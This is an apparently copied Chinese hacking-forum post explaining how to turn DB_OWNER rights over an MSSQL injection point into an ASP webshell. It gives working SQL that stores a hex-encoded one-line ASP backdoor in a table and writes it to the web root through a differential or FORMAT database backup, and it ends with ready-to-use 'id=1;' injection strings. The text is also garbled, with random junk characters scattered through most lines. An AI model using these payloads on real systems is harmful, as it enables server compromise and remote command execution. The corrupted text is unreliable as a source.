DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

. l# [" d' j+ X8 J, x9 g  _减少备份文件大小，得到可执行的webshell成功率提高不少
5 I  w# l* k! H! v- a" z一利用差异备份
3 L# n! M: D' Q2 f; \) R% O; E8 u加一个参数WITH DIFFERENTIAL
* {) t5 _* Y4 v5 r% I2 }
1
2
3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
+ v! y, S+ |2 F. V. F3 ocreate table [dbo].[xiaolu] ([cmd] [image]);
  a! @) x8 l7 h6 B/ k' Einsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
  o$ n$ V) J. pdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

二利用完全FORMAT
& D, r1 j7 i$ [+ Y( i加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
2 z, I5 d  @% Y( [$ |4 {4 J/ W
1
" `7 ?. z5 Q& `" Q# A+ ]1 a2
5 Z+ {4 X/ [  G7 u  s3
4
0 @" o; W  c! j8 V declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
9 H; B2 R* E% N2 jcreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
& {$ G9 m' B) |0 l0 p9 K" gdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

% N0 _* z9 [: }  ~总的来说就是那么简单几句,下面以备份数据库model为例子
1
9 z* p6 B/ X- A, T+ A* O
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

2
% q) e" m% ~8 O+ a% T  A# e
9 W5 U' t8 G0 n& Z5 S0 f4 u1
id=1;backup database model to disk='你的路径‘ with differential,format;--